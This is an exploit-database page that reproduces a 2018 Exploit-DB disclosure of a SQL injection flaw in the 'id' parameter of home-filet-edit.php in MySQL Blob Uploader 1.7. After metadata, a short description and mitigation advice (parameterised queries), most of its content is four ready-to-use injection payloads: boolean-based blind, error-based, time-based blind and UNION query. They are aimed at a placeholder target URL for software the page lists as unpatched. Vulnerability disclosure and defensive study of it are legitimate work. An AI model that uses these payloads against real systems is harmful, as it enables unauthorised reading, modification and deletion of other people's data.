header-logo
Suggest Exploit
vendor:
MySQL File and Image Uploader and Sharing Blob File Server
by:
Özkan Mustafa Akkus (AkkuS)
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: MySQL File and Image Uploader and Sharing Blob File Server
Affected Version From: 1.7
Affected Version To: 1.7
Patch Exists: NO
Related CWE: N/A
CPE: a:codecanyon:mysql_file_and_image_uploader_and_sharing_blob_file_server
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2018

MySQL Blob Uploader 1.7 – ‘home-filet-edit.php’ SQL Injection

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'id' parameter of '/MySqlBlobUploader/home-filet-edit.php' script. A remote attacker can execute arbitrary SQL commands in application's database, cause denial of service, bypass certain security restrictions, access, modify or delete data. There are four types of SQL injection: boolean-based blind, error-based, AND/OR time-based blind and UNION query.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should use parameterized queries (also known as prepared statements) when interacting with the database.
Source

Exploit-DB raw data:

# Exploit Title: MySQL Blob Uploader 1.7 - 'home-filet-edit.php' SQL Injection
# Dork: N/A
# Date: 2018-05-22
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300
# Version: 1.7 - seventh update
# Category: Webapps
# Tested on: Kali linux

# PoC: SQLi:
# Parameter: id
# Type: boolean-based blind
# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7
# Payload: 

id=7' AND 3132=3132 AND 'erLO'='erLO

# Type: error-based
# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7
# Payload: 

id=7' AND (SELECT 6373 FROM(SELECT
COUNT(*),CONCAT(0x71717a6b71,(SELECT
(ELT(6373=6373,1))),0x716b706a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JvQj'='JvQj

# Type: AND/OR time-based blind
# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7
# Payload: 

id=7' AND SLEEP(5) AND 'MvuE'='MvuE

# Type: UNION query
# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7
# Payload: 

id=-3399' UNION ALL SELECT
CONCAT(0x71717a6b71,0x6d54504e42544e4b6e6b7a6661595a6a73546d6d4563546554615368546a4a4e4e7a6d6279515672,0x716b706a71),NULL,NULL,NULL,NULL,NULL,NULL--
EcgK